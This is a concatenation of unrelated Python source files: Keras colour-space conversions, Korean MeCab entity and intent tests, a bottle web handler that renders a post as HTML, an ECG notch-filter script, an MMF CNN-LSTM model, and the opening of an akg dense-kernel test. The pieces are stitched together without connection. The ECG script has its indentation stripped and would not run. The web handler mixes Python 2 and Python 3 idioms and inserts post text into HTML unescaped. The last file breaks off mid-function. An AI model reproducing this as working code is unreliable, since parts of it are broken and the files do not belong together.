    https://en.wikipedia.org/wiki/CIE_1931_color_space
    http://www.brucelindbloom.com/index.html?Eqn_XYZ_to_xyY.html
    '''
    X, Y, Z = XYZ[..., 0], XYZ[..., 1], XYZ[..., 2]
    total = X + Y + Z
    epsilon = 1.0 / 1000.0
    # Where the sum is effectively zero, divide by 1.0 to avoid NaNs.
    near_zero = K.cast(total < epsilon, dtype='float32')
    safe_total = near_zero + (1.0 - near_zero) * total
    return K.stack([X / safe_total, Y / safe_total, Y], axis=-1)
def xyy_to_xyz(xyY):
    '''
    convert from xyY color space to XYZ
    xyY: normalized chromaticity with xy in 0-1, Y in 0-inf
    XYZ: consistent units for each component
    https://en.wikipedia.org/wiki/CIE_1931_color_space
    http://www.brucelindbloom.com/index.html?Eqn_xyY_to_XYZ.html
    '''
    x, y, Y = xyY[..., 0], xyY[..., 1], xyY[..., 2]
    # Where y is ~0 the chromaticity is undefined; mask those elements out.
    invalid_mask = K.cast(y < SMALL_COMPONENT_VALUE, dtype='float32')
    valid_mask = 1.0 - invalid_mask
    # Replace invalid y with 1.0 so the division below is safe.
    y = invalid_mask + valid_mask * y
    norm = Y / y
    X = x * norm
    Z = (1 - x - y) * norm
    # Zero out components computed from invalid inputs.
    X *= valid_mask
    Y *= valid_mask
    Z *= valid_mask
    return K.stack([X, Y, Z], axis=-1)
def rgb_to_ycbcr(rgb):
    '''
    convert from rgb color space to YCbCr
    rgb: rgb color space
    YCbCr: luminance with 2 chroma channels
    https://en.wikipedia.org/wiki/YCbCr
    http://www.brucelindbloom.com/index.html?Eqn_XYZ_to_xyY.html
    '''
    ycbcr = K.dot(rgb, K.constant(M_RGB_TO_YCBCR_T))
    y, cb, cr = ycbcr[..., 0], ycbcr[..., 1], ycbcr[..., 2]
    # Luma offset intentionally left disabled — presumably YCBCR_MIN == 0 in
    # this configuration; TODO confirm against cex_constants.
    # y += YCBCR_MIN
    # y -= YCBCR_MIN
    y /= YCBCR_YMAX - YCBCR_MIN
    # Shift chroma from its signed range to 0-based, then normalize.
    cb += YCBCR_OFFSET
    cb -= YCBCR_MIN
    cb /= YCBCR_CMAX - YCBCR_MIN
    cr += YCBCR_OFFSET
    cr -= YCBCR_MIN
    cr /= YCBCR_CMAX - YCBCR_MIN
    return K.stack([y, cb, cr], axis=-1)
def ycbcr_to_rgb(ycbcr):
    '''
    convert from YCbCr color space to srgb
    YCbCr: luminance with 2 chroma channels
    srgb: rgb color space
    https://en.wikipedia.org/wiki/YCbCr
    http://www.brucelindbloom.com/index.html?Eqn_XYZ_to_xyY.html
    '''
    y, cb, cr = ycbcr[..., 0], ycbcr[..., 1], ycbcr[..., 2]
    # Inverse of rgb_to_ycbcr: undo normalization, then undo the chroma shift.
    y *= YCBCR_YMAX - YCBCR_MIN
    # Luma offset intentionally left disabled — presumably YCBCR_MIN == 0 in
    # this configuration; TODO confirm against cex_constants.
    # y += YCBCR_MIN
    # y -= YCBCR_MIN
    cb *= YCBCR_CMAX - YCBCR_MIN
    cb += YCBCR_MIN
    cb -= YCBCR_OFFSET
    cr *= YCBCR_CMAX - YCBCR_MIN
    cr += YCBCR_MIN
    cr -= YCBCR_OFFSET
    ycbcr = K.stack([y, cb, cr], axis=-1)
    return K.dot(ycbcr, K.constant(M_YCBCR_TO_RGB_T))
#### following transforms are macros using the above primitive transforms
def xyz_to_srgb(xyz):
    'convert xyz to srgb via linear rgb'
    return rgb_to_srgb(xyz_to_rgb(xyz))
def srgb_to_xyz(srgb):
    'convert srgb to xyz via linear rgb'
    return rgb_to_xyz(srgb_to_rgb(srgb))
def srgb_to_lab(srgb):
    'convert srgb to lab via xyz'
    return xyz_to_lab(srgb_to_xyz(srgb))
def lab_to_srgb(lab):
    'convert lab to srgb via xyz'
    return xyz_to_srgb(lab_to_xyz(lab))
def rgb_to_lab(rgb):
    'convert linear rgb to lab via xyz'
    return xyz_to_lab(rgb_to_xyz(rgb))
def lab_to_rgb(lab):
    'convert lab to linear rgb via xyz'
    return xyz_to_rgb(lab_to_xyz(lab))
def rgb_to_xyy(rgb):
    'convert linear rgb to xyY via xyz'
    return xyz_to_xyy(rgb_to_xyz(rgb))
def srgb_to_xyy(srgb):
    'convert srgb to xyY via linear rgb and xyz'
    return rgb_to_xyy(srgb_to_rgb(srgb))
def lab_to_xyy(lab):
    'convert lab to xyY via xyz'
    return xyz_to_xyy(lab_to_xyz(lab))
def xyy_to_rgb(xyy):
    'convert xyY to linear rgb via xyz'
    return xyz_to_rgb(xyy_to_xyz(xyy))
def xyy_to_srgb(xyy):
    'convert xyY to srgb via xyz and linear rgb'
    return rgb_to_srgb(xyy_to_rgb(xyy))
def xyy_to_lab(xyy):
    'convert xyY to lab via xyz'
    return xyz_to_lab(xyy_to_xyz(xyy))
class Bias(keras.layers.Layer):
    'simple layer for testing'
    # Learns a single scalar that is added to every element of the input.
    def __init__(self, **kwargs):
        # Weight is created lazily in build(); None until then.
        self.bias = None
        super(Bias, self).__init__(**kwargs)
    def build(self, input_shape):
        'creates trainable weight variable for this bias layer'
        self.bias = self.add_weight(
            name='weights',
            shape=(1,),
            initializer='zeros',
            trainable=True,
        )
        super(Bias, self).build(input_shape)  # will set self.built = True
    def call(self, inputs, **kwargs):
        'builds an output tensor for this op'
        return inputs + self.bias
# (from_space, to_space) -> conversion function.  None marks pairs with no
# conversion path implemented; color_space() must treat those as errors.
TRANSFORMS = {
    (S.SRGB, S.RGB): srgb_to_rgb,
    (S.SRGB, S.XYZ): srgb_to_xyz,
    (S.SRGB, S.LAB): srgb_to_lab,
    (S.SRGB, S.LUM): None,
    (S.SRGB, S.xyY): srgb_to_xyy,
    (S.RGB, S.SRGB): rgb_to_srgb,
    (S.RGB, S.XYZ): rgb_to_xyz,
    (S.RGB, S.LAB): rgb_to_lab,
    (S.RGB, S.LUM): rgb_to_luminance,
    (S.RGB, S.xyY): rgb_to_xyy,
    (S.RGB, S.YCbCr): rgb_to_ycbcr,
    (S.XYZ, S.RGB): xyz_to_rgb,
    (S.XYZ, S.LAB): xyz_to_lab,
    (S.XYZ, S.SRGB): xyz_to_srgb,
    (S.XYZ, S.LUM): None,
    (S.XYZ, S.xyY): xyz_to_xyy,
    (S.LAB, S.XYZ): lab_to_xyz,
    (S.LAB, S.SRGB): lab_to_srgb,
    (S.LAB, S.RGB): lab_to_rgb,
    (S.LAB, S.LUM): None,
    (S.LAB, S.xyY): lab_to_xyy,
    (S.xyY, S.SRGB): xyy_to_srgb,
    (S.xyY, S.RGB): xyy_to_rgb,
    (S.xyY, S.XYZ): xyy_to_xyz,
    (S.xyY, S.LAB): xyy_to_lab,
    (S.xyY, S.LUM): None,
    (S.YCbCr, S.RGB): ycbcr_to_rgb,
}
def color_space(from_space, to_space, values):
    '''
    lookup color transform from_space to_space
    apply transform and return output tensor
    short circuit compute if from_space == to_space
    raises ValueError when no transform is registered for the pair
    '''
    if from_space == to_space:
        return values
    transform = TRANSFORMS.get((from_space, to_space))
    if transform is None:
        # Bug fix: the original built the ValueError but never raised it,
        # so an unknown pair crashed later with "'NoneType' is not callable".
        raise ValueError(f'bad transform[{from_space.name},{to_space.name}]')
    return transform(values)
def color_space_numpy(from_space, to_space, values):
    'numpy wrapper for backend color transform'
    out = color_space(from_space, to_space, K.constant(values))
    return out.numpy() if hasattr(out, 'numpy') else out
class ColorSpace(keras.layers.Layer):
    'keras layer converting tensors from_space to_space'

    def __init__(self, from_space, to_space, **kwargs):
        self.from_space = S[from_space]
        self.to_space = S[to_space]
        super(ColorSpace, self).__init__(**kwargs)

    def call(self, inputs, **kwargs):
        'builds an output tensor for this op'
        return color_space(self.from_space, self.to_space, inputs)

    def get_config(self):
        'save from and to attributes'
        config = super(ColorSpace, self).get_config()
        config['from_space'] = self.from_space.name
        config['to_space'] = self.to_space.name
        return config

    def compute_output_shape(self, input_shape):
        'some transforms remove the color dimension'
        if self.to_space in (S.LUM,):
            return input_shape[:-1]
        return input_shape
|
import os
from mecab_value_extractor_dir.ner_intent_dir import utility_data, ner_string, ner_mecab
# Repository-relative data locations.
PARENT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
entity_dir_path = PARENT_DIR + "/data_dir/entity_mecab"
intent_dir_path = PARENT_DIR + "/data_dir/intent_mecab"
entity_filenames = os.listdir(entity_dir_path)
intent_filenames = os.listdir(intent_dir_path)
# Index constants for split filenames ("<class>_<large>_<small>.<ext>").
FILENAME_ONLY = 0
# Index constants for CSV rows: (filename, sentence, entity labels).
USER_SENTENCE = 1
ENTITY = 2
LARGE_CATEGORY = 1
SMALL_CATEGORY = 2
ENTITY_INTENT_CLASS = 0
# Index constants into matcher results.
ONLY_ONE_VALUE = 0
CATEGORY = 0
VALUE = 1
BLANK_LIST = []
def test_ner_string():
    """Compare string-matched entities against the labelled call-center CSV.

    Prints matching rows and the overall match count, and writes a per-row
    comparison report to tmp.csv.
    """
    entity_list_path = PARENT_DIR + "/entity_dir/entity_dump/call_center_entity.txt"
    csv_dir = PARENT_DIR + "/test_dir/call_center_data/call_center.csv"
    write_dir = "tmp.csv"
    e_s = ner_string.EntityString(entity_list_path)
    # Fix: read the CSV once instead of re-reading it for the final count.
    rows = utility_data.read_csv(csv_dir)
    is_same_cnt = 0
    tmp_list = []
    for idx, csv_item in enumerate(rows):
        is_same = False
        sentence, entity_contain_list = e_s.get_entity_list(csv_item[USER_SENTENCE])
        entity_contain_list.sort()
        # Fix: use the ENTITY column constant instead of the magic index 2.
        csv_entity_list = [x.strip() for x in csv_item[ENTITY].split(",")]
        csv_entity_list.sort()
        if all(elem in entity_contain_list for elem in csv_entity_list):
            print(idx, csv_item[USER_SENTENCE])
            is_same_cnt += 1
            is_same = True
        tmp_list.append([csv_item[USER_SENTENCE], csv_item[ENTITY], ", ".join(entity_contain_list), ", ".join(csv_entity_list), is_same])
    print(is_same_cnt, "/", len(rows))
    utility_data.write_csv(write_dir, tmp_list)
def test_ner_mecab():
    """Compare MeCab-matched entities against the labelled call-center CSV.

    Prints matching rows and the overall match count, and writes a per-row
    comparison report to tmp_mecab.csv.
    """
    entity_list_path = PARENT_DIR + "/entity_dir/entity_dump/call_center_entity_mecab.txt"
    csv_dir = PARENT_DIR + "/test_dir/call_center_data/call_center.csv"
    write_dir = "tmp_mecab.csv"
    e_m = ner_mecab.EntityMeCab(entity_list_path)
    # Fix: read the CSV once instead of re-reading it for the final count.
    rows = utility_data.read_csv(csv_dir)
    is_same_cnt = 0
    tmp_list = []
    for idx, csv_item in enumerate(rows):
        is_same = False
        sentence, entity_contain_list = e_m.get_mecab_list(csv_item[USER_SENTENCE])
        entity_contain_list.sort()
        # Fix: use the ENTITY column constant instead of the magic index 2.
        csv_entity_list = [x.strip() for x in csv_item[ENTITY].split(",")]
        csv_entity_list.sort()
        if all(elem in entity_contain_list for elem in csv_entity_list):
            print(idx, csv_item[USER_SENTENCE])
            is_same_cnt += 1
            is_same = True
        tmp_list.append([csv_item[USER_SENTENCE], csv_item[ENTITY], ", ".join(entity_contain_list), ", ".join(csv_entity_list), is_same])
    print(is_same_cnt, "/", len(rows))
    utility_data.write_csv(write_dir, tmp_list)
def get_entity_intent(sentence):
    """Match `sentence` against every entity and intent dictionary file.

    Returns (sentence, entity_item, intent_item) for the first entity/intent
    pair sharing the same large category, or False when no pair matches.
    """
    entity_list = []
    intent_list = []
    # 1. Check the sentence against each entity matching file.
    for entity_search_list in entity_filenames:
        data_copy = sentence
        entity_data_path = os.path.join(entity_dir_path, entity_search_list)
        e_m = ner_mecab.EntityMeCab(entity_data_path)
        sentence_mecab_list, entity_contain_list = e_m.get_mecab_list(data_copy)
        # 1-1. When this category's file produced a match, record
        #      (class, large category, small category, matched value).
        if entity_contain_list != BLANK_LIST:
            split_filename = os.path.splitext(entity_search_list)
            file_name = split_filename[FILENAME_ONLY]
            file_split_list = file_name.split("_")
            entity_list.append(
                [file_split_list[ENTITY_INTENT_CLASS], file_split_list[LARGE_CATEGORY], file_split_list[SMALL_CATEGORY],
                 entity_contain_list[ONLY_ONE_VALUE][VALUE]])
    # 2. Check the sentence against each intent matching file.
    for intent_search_list in intent_filenames:
        data_copy = sentence
        intent_data_path = os.path.join(intent_dir_path, intent_search_list)
        i_m = ner_mecab.EntityMeCab(intent_data_path)
        sentence_mecab_list, intent_contain_list = i_m.get_mecab_list(data_copy)
        # 2-1. When this category's file produced a match, record
        #      (class, large category, small category, matched category).
        if intent_contain_list != BLANK_LIST:
            split_filename = os.path.splitext(intent_search_list)
            file_name = split_filename[FILENAME_ONLY]
            file_split_list = file_name.split("_")
            intent_list.append([file_split_list[ENTITY_INTENT_CLASS], file_split_list[LARGE_CATEGORY], file_split_list[SMALL_CATEGORY],
                                intent_contain_list[ONLY_ONE_VALUE][CATEGORY]])
    # 3. Pair up an entity and an intent from the same large category.
    for entity_item in entity_list:
        for intent_item in intent_list:
            if entity_item[LARGE_CATEGORY] == intent_item[LARGE_CATEGORY]:
                return sentence, entity_item, intent_item
    return False
def test_ner_intent():
    """Run entity/intent extraction over the first five example sentences."""
    example_data = "./entity_intent_example.txt"
    # Load example sentences (first five only) and extract from each.
    data_parse_list = [get_entity_intent(item)
                       for item in utility_data.read_txt(example_data)[:5]]
    utility_data.write_csv("tmp.csv", data_parse_list)
if __name__ == "__main__":
    import time
    # Time one end-to-end extraction run and print the elapsed seconds.
    st = time.time()
    test_ner_intent()
    et = time.time()
    print(et-st)
# -*- coding: utf-8 -*-
import time
import logging
from bottle import route, response
from error import ApplicationError, PostNotExistError
from http import get_response, get_request
from utilities import TimeUtil
req_proto = {'num': int, }  # number of the post to view
# Response prototype used for error replies.
res_proto = {'code': int,
             'msg': str, }
@route('/feed', method='GET')
def feed(app):
    """
    Render the feed view for a single post (linked from the RSS feed).

    Call:
        http://localhost:8080/feed?num=1
    Result:
        an HTML document
    """
    try:
        req = get_request(req_proto)
        try:
            session = req['session']
            readerid = str(session['userid'])
        except (KeyError, TypeError):
            # Fix: was a bare `except:` which also hid programming errors.
            # No session means the caller is not logged in and may only see
            # public posts.
            readerid = None
        num = int(req['num'])
        with app.postdb() as db:
            post = app.postmgr.get_post(db, num, readerid)
        response.content_type = 'text/html'
        if post:
            url = "http://{0}".format(app.publichost)
            html = _generate_html(url, post.num, post.wid, post.wnick, post.wtime, post.status, post.images, post.context)
        else:
            raise PostNotExistError("post not exist. readerid=%s, post_num=%s" % (readerid, num))
        return html
    except ApplicationError as e:
        logging.debug(e)
        return get_response(res_proto, e)
    except Exception as e:
        # Boundary handler: log unexpected failures; bottle then returns an
        # empty response body.
        logging.exception(e)
def _get_top_menus(top_menus):
    """
    Render {label: url} entries as ' | '-separated anchor links, e.g.
    top_menus = {"Forum": "http://localhost:8080/feed?num=1",
                 "Contact": "http://localhost:8080/feed?num=2",
                 "Test": "http://localhost:8080/feed?num=3"}
    """
    links = ['<a href="{1}">{0}</a>'.format(label, link)
             for label, link in top_menus.iteritems()]
    return " | ".join(links)
def _generate_html(url, num, userid, wnick, wtime, status, images, context):
    """Build the HTML page for one post.

    `num` and `images` are currently unused but kept for interface
    compatibility with feed().
    """
    # Fix: replaced a leftover debug `print` statement with debug logging.
    logging.debug("wtime type=%s value=%s", type(wtime), wtime)
    title = "TinyPost"
    css_path = url + "/files/style.css"
    date_img_path = url + "/files/timeicon.gif"
    comment_img_path = url + "/files/comment.gif"
    top_menus = {"Forum": url + "/feed?num=1",
                 "Contact": url + "/feed?num=2",
                 "Test": url + "/feed?num=3", }
    comment_link = url + "/feed?num=4"
    comment_count = 0
    hrtime = TimeUtil.get_human_readable_time(time.mktime(time.strptime(wtime, "%Y-%m-%d %H:%M:%S")))
    if status == 1:
        post_type = "나의 포스팅"
    elif status == 2:
        post_type = "친구 공개 포스팅"
    elif status == 3:
        post_type = "전체 공개 포스팅"
    else:
        # Fix: the original format string had no %s placeholder, so this
        # line itself raised TypeError instead of the intended message.
        raise Exception("status is not valid. status=%s" % (status,))
    args = (title,
            css_path,
            _get_top_menus(top_menus),
            title,
            post_type,
            "%s(%s)" % (userid, wnick),
            context,
            comment_img_path,
            comment_link,
            comment_count,
            date_img_path,
            hrtime,)
    html = """
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html>
    <head>
    <title>{0}</title>
    <meta http-equiv="Content-type" content="text/html; charset=UTF-8" />
    <style type="text/css" media="all">
    @import url({1});
    </style>
    </head>
    <body>
    <div id="page-container">
    <div id="top"> {2}
    <h1>{3}</h1>
    </div>
    <div id="content">
    <div class="padding">
    <h2>{4}</h2>
    <br />
    <h4><a href="#">{5}</a></h4>
    <br />
    {6}
    <p class="date"><img src="{7}" alt="" /> <a href="{8}">Comments({9})</a> <img src="{10}" alt="" /> {11}.</p>
    </div>
    </div>
    <div id="footer"> <a href="#">RSS Feed</a> | <a href="#">Contact</a> | <a href="#">Accessibility</a> | <a href="#">Products</a> | <a href="#">Disclaimer</a> | <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a> and <a href="http://validator.w3.org/check?uri=referer">XHTML</a> <br />
    Copyright © 2014 Koo - Design: Green Grass <a href="http://www.free-css-templates.com"><NAME></a> </div>
    </div>
    </body>
    </html>
    """.format(*args)
    return html
|
"""
main.py (Signal Processing of an ECG program)
The main module for the Signal Processing of an ECG program.
This module imports ECG data from a .txt and creates IIR and
FIR notch filters to reduce narrowband noise from the data.
Figures of the data, filtered data and filter responses are
produced. The noise power is calculated. All results are
saved in the current directory. This was first designed for
ENEL420 Assignment 1.
Authors: <NAME> (58979250)
<NAME> (23200856)
Last Modified: 27/12/2020
"""
# Imported libraries
from scipy.signal import freqz, lfilter, firwin, remez, firwin2, convolve, kaiserord
from scipy.fft import fft
import numpy as np
from signalPlots import *
from IIR import *
from FIR import *
from noise import calculateNoiseVariancePerFilter, saveNoisePowerData
from configFiles import importData
from config import *
def main():
"""Main function of the Signal Processing of an ECG program."""
# Gather data from input files
samples = importData(DATA_FILENAME) # Import data from file
base_time = getTimeData(SAMPLE_RATE, len(samples)) # Create a time array based on imported data
base_freq, base_freq_data = calcFreqSpectrum(samples, SAMPLE_RATE) # Calculate the frequency spectrum of the data
# Create and apply IIR filters to data
notch_num_1, notch_denom_1 = createIIRNotchFilter(CUTOFF_FREQS[0], NOTCH_WIDTH, PASSBAND_FREQ, SAMPLE_RATE) # Calculate the first notch filter's coefficents
notch_num_2, notch_denom_2 = createIIRNotchFilter(CUTOFF_FREQS[1], NOTCH_WIDTH, PASSBAND_FREQ, SAMPLE_RATE) # Calculate the second notch filter's coefficents
half_IIR_samples, IIR_samples = applyIIRNotchFilters(notch_num_1, notch_denom_1, notch_num_2, notch_denom_2, samples) # Apply cascaded notch filters to data
notch_time = getTimeData(SAMPLE_RATE, len(IIR_samples)) # Create a time array based on notch filtered data
notch_frequency, notch_freq_data = calcFreqSpectrum(IIR_samples, SAMPLE_RATE) # Calculate frequency of the IIR filtered ECG data
notched_numerator, notched_denominator = combineFilters(notch_num_1, notch_denom_1, notch_num_2, notch_denom_2) # Combine the two IIR notch filters
# Create and apply FIR window filters to data
window_filter_1, window_filter_2, window_filter_overall = createWindowFilters(CUTOFF_FREQS, SAMPLE_RATE, NOTCH_WIDTH, NUM_FIR_TAPS) # Calculate window filter coefficents
half_windowed_samples, full_windowed_samples, overall_windowed_samples = applyFIRFilters(window_filter_1, window_filter_2, window_filter_overall, samples) # Apply window filter to data
win_time = getTimeData(SAMPLE_RATE, len(full_windowed_samples)) # Create a time array based on window filtered data
win_frequency, win_freq_data = calcFreqSpectrum(overall_windowed_samples, SAMPLE_RATE) # Calculate frequency of the window IIR filtered ECG data
# Create and apply FIR optimal filters to data
optimal_filter_1, optimal_filter_2, optimal_filter_overall = createOptimalFilters(CUTOFF_FREQS, SAMPLE_RATE, NOTCH_WIDTH, NUM_FIR_TAPS)
half_optimal_samples, full_optimal_samples, overall_optimal_samples = applyFIRFilters(optimal_filter_1, optimal_filter_2, optimal_filter_overall, samples)
opt_time = getTimeData(SAMPLE_RATE, len(full_optimal_samples)) # Create a time array based on optimal filtered data
opt_frequency, opt_freq_data = calcFreqSpectrum(overall_optimal_samples, SAMPLE_RATE) # Frequency spectrum of the optimal filtered ECG data (comment was mislabelled "window IIR")
# Create and apply FIR frequency sampling filters to data
freq_sampling_filter_1, freq_sampling_filter_2, freq_filter_overall = createFreqSamplingFilters(CUTOFF_FREQS, SAMPLE_RATE, NOTCH_WIDTH, NUM_FIR_TAPS)
half_freq_samples, full_freq_samples, overall_freq_samples = applyFIRFilters(freq_sampling_filter_1, freq_sampling_filter_2, freq_filter_overall, samples)
freq_sampling_time = getTimeData(SAMPLE_RATE, len(full_freq_samples)) # Time array for the frequency-sampling filtered data (comment was mislabelled "optimal")
freq_s_frequency, freq_s_freq_data = calcFreqSpectrum(overall_freq_samples, SAMPLE_RATE) # Frequency spectrum of the frequency-sampling filtered ECG data (comment was mislabelled "window IIR")
# Plot unfiltered data
ECG = plotECG(samples, base_time) # Plot a time domain graph of the ECG data
ECGSpectrum = plotECGSpectrum(base_freq, base_freq_data) # Plot the frequency spectrum of the ECG data
# Plot IIR notch filtered data
IIRPoleZero = plotIIRPoleZero(CUTOFF_FREQS, NOTCH_WIDTH, SAMPLE_RATE) # Plot a pole-zero plot of the created IIR notch filter
IIRNotchECG = plotIIRNotchECG(IIR_samples, notch_time) # Plot a time domain graph of the IIR notch filtered ECG data
IIRNotchECGSpectrum = plotIIRNotchECGSpectrum(notch_frequency, notch_freq_data) # Plot the frequency spectrum of the IIR notch filtered ECG data
IIRNotchFilterResponse = plotIIRNotchFilterResponse(notched_numerator, notched_denominator, SAMPLE_RATE) # Plot the frequency response of the notch filter
# Plot window filtered data
WindowedECG = plotWindowedECG(overall_windowed_samples, win_time) # Plot a time domain graph of the window filtered ECG data
WindowedECGSpectrum = plotWindowedECGSpectrum(win_frequency, win_freq_data) # Plot the frequency spectrum of the window filtered ECG data
WindowFilterResponse = plotWindowFilterResponse(window_filter_overall, SAMPLE_RATE) # Plot the frequency response of the window filter
# Plot optimal filtered data
OptimalECG = plotOptimalECG(overall_optimal_samples, opt_time) # Plot a time domain graph of the optimal filtered ECG data
OptimalECGSpectrum = plotOptimalECGSpectrum(opt_frequency, opt_freq_data) # Plot the frequency spectrum of the optimal filtered ECG data
OptimalFilterResponse = plotOptimalFilterResponse(optimal_filter_overall, SAMPLE_RATE) # Plot the frequency response of the optimal filter
# Plot frequency sampling filtered data
FrequencySamplingECG = plotFrequencySampledECG(overall_freq_samples, freq_sampling_time) # Plot a time domain graph of the frequency sampling filtered ECG data
FrequencySamplingECGSpectrum = plotFrequencySampledECGSpectrum(freq_s_frequency, freq_s_freq_data) # Plot the frequency spectrum of the frequency sampling filtered ECG data
FrequencySamplingFilterResponse = plotFrequencySampledFilterResponse(freq_filter_overall, SAMPLE_RATE) # Plot the frequency response of the frequency sampling filter
# Save figures
figures = [ECG, ECGSpectrum, IIRPoleZero, IIRNotchECG, IIRNotchECGSpectrum, IIRNotchFilterResponse, WindowedECG,
           WindowedECGSpectrum, WindowFilterResponse, OptimalECG, OptimalECGSpectrum, OptimalFilterResponse,
           FrequencySamplingECG, FrequencySamplingECGSpectrum, FrequencySamplingFilterResponse] # The figures to save, which must be in the same order as FIGURE_NAMES
saveFigures(figures, FIGURES_FOLDER_NAME, FIGURE_NAMES) # Save the figures to an output folder in the current directory
# Calculate the variance of the noise removed by each filter chain
# NOTE(review): the 3rd and 4th arguments below are both IIR_samples, while every
# other filter passes (half, full, overall) stages — confirm this is intentional.
IIR_noise_variance, first_IIR_noise_variance, second_IIR_noise_variance = calculateNoiseVariancePerFilter(samples, half_IIR_samples, IIR_samples, IIR_samples) # Calculate the noise removed by the IIR filter
window_noise_variance, first_window_noise_variance, second_window_noise_variance = calculateNoiseVariancePerFilter(samples, half_windowed_samples, full_windowed_samples, overall_windowed_samples) # Calculate the noise removed by the window filter
# NOTE(review): the optimal-filter call passes half_IIR_samples (not a half_optimal
# stage) as its half-filtered input — confirm against the analysis intent.
optimal_noise_variance, first_optimal_noise_variance, second_optimal_noise_variance = calculateNoiseVariancePerFilter(samples, half_IIR_samples, full_optimal_samples, overall_optimal_samples) # Calculate the noise removed by the optimal filter
freq_noise_variance, first_freq_noise_variance, second_freq_noise_variance = calculateNoiseVariancePerFilter(samples, half_freq_samples, full_freq_samples, overall_freq_samples) # Calculate the noise removed by the frequency sampling filter
# Save noise power to a .txt file
noise_power_data = {FILTER_NAMES[0]: IIR_noise_variance, FILTER_NAMES[1]: first_IIR_noise_variance,
                    FILTER_NAMES[2]: second_IIR_noise_variance, FILTER_NAMES[3]: window_noise_variance,
                    FILTER_NAMES[4]: first_window_noise_variance, FILTER_NAMES[5]: second_window_noise_variance,
                    FILTER_NAMES[6]: optimal_noise_variance, FILTER_NAMES[7]: first_optimal_noise_variance,
                    FILTER_NAMES[8]: second_optimal_noise_variance, FILTER_NAMES[9]: freq_noise_variance,
                    FILTER_NAMES[10]: first_freq_noise_variance, FILTER_NAMES[11]: second_freq_noise_variance} # Map each filter name (FILTER_NAMES order) to its measured noise power
saveNoisePowerData(noise_power_data, NOISE_POWER_OUTPUT_FILENAME) # Save the data about each filter to a file
# Run program if called
if __name__ == '__main__':
main() |
<filename>mmf/models/cnn_lstm.py
from copy import deepcopy
import torch
from torch import nn
from mmf.common.registry import registry
from mmf.models.base_model import BaseModel
from mmf.modules.layers import ClassifierLayer, ConvNet, Flatten
# Registry-key templates; "{}" is filled with the dataset name in CNNLSTM.build().
_TEMPLATES = {
    "question_vocab_size": "{}_text_vocab_size",
    "number_of_answers": "{}_num_final_outputs",
}
# Static strings reused across this module (assertion messages, etc.).
_CONSTANTS = {"hidden_state_warning": "hidden state (final) should have 1st dim as 2"}
@registry.register_model("cnn_lstm")
class CNNLSTM(BaseModel):
    """A deliberately simple baseline model for vision-and-language tasks.

    The image is encoded by a small CNN and the question by an LSTM; the two
    representations are fused by concatenation and passed through an MLP
    classifier that scores every candidate answer.

    Args:
        config (DictConfig): Configuration node containing everything needed
            to initialize CNNLSTM.

    Inputs: sample_list (SampleList)
        - **sample_list** must provide ``image`` (the image tensor), ``text``
          (question word indices) and ``targets`` (answer scores).
    """

    def __init__(self, config):
        super().__init__(config)
        self._global_config = registry.get("config")
        self._datasets = self._global_config.datasets.split(",")

    @classmethod
    def config_path(cls):
        return "configs/models/cnn_lstm/defaults.yaml"

    def build(self):
        assert len(self._datasets) > 0
        primary_dataset = self._datasets[0]

        # Vocabulary / answer-space sizes are published in the registry by the
        # dataset builder; look them up via the shared key templates.
        num_question_choices = registry.get(
            _TEMPLATES["question_vocab_size"].format(primary_dataset)
        )
        num_answer_choices = registry.get(
            _TEMPLATES["number_of_answers"].format(primary_dataset)
        )

        # Text branch: embedding lookup followed by an LSTM.
        self.text_embedding = nn.Embedding(
            num_question_choices, self.config.text_embedding.embedding_dim
        )
        self.lstm = nn.LSTM(**self.config.lstm)

        # Image branch: a stack of ConvNet layers flattened into a vector.
        layers_config = self.config.cnn.layers
        conv_layers = []
        for idx, in_dim in enumerate(layers_config.input_dims):
            conv_layers.append(
                ConvNet(
                    in_dim,
                    layers_config.output_dims[idx],
                    kernel_size=layers_config.kernel_sizes[idx],
                )
            )
        conv_layers.append(Flatten())
        self.cnn = nn.Sequential(*conv_layers)

        # The output dim is only known at build time, so mutate a copy of the
        # classifier config rather than the shared one.
        classifier_config = deepcopy(self.config.classifier)
        classifier_config.params.out_dim = num_answer_choices
        self.classifier = ClassifierLayer(
            classifier_config.type, **classifier_config.params
        )

    def forward(self, sample_list):
        self.lstm.flatten_parameters()

        # Encode the question; keep only the final hidden state h_n of (h_n, c_n).
        _, (h_n, _c_n) = self.lstm(self.text_embedding(sample_list.text))

        # (num_layers * num_directions) x B x H  ->  B x X x H
        hidden = h_n.transpose(0, 1)
        # The merge below assumes exactly two final states.
        assert hidden.size(1) == 2, _CONSTANTS["hidden_state_warning"]
        text_feature = torch.cat([hidden[:, 0, :], hidden[:, 1, :]], dim=-1)

        image_feature = self.cnn(sample_list.image)

        # Late fusion by concatenation, then score every answer.
        fused = torch.cat([text_feature, image_feature], dim=-1)
        return {"scores": self.classifier(fused)}
|
<reponame>laekov/akg
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""dense_run"""
import numpy as np
from akg.utils import kernel_exec as utils
from test_op import dense
from tensorio import compare_tensor
from gen_random import random_gaussian
def dense_run(batch, in_dim, out_dim, dtype, bias, attrs):
    """run function for dsl function dense.

    Builds the `dense` (matmul, optionally + bias) kernel with random inputs
    and either hands the artifacts to the tuning harness or launches the
    kernel and compares it against a NumPy reference.

    Args:
        batch, in_dim, out_dim: matmul dimensions; d1 is (batch, in_dim) and
            the weight w1 is (out_dim, in_dim).
        dtype: numpy dtype name used for all tensors.
        bias: whether a bias vector is added to each output column.
        attrs: build attributes; may carry 'tuning' and 'kernel_name' keys.

    Returns:
        Tuning mode: (mod, exp_output, args) when actually tuning, else mod.
        Normal mode: (inputs, acu_output, exp_output, compare_result).
    """
    op_attrs = [bias]
    # --- Tuning mode: build only; the harness launches the kernel itself. ---
    if 'tuning' in attrs.keys():
        t = attrs.get("tuning", False)
        kernel_name = attrs.get("kernel_name", False)
        d1 = random_gaussian((batch, in_dim), miu=1, sigma=0.1).astype(dtype)
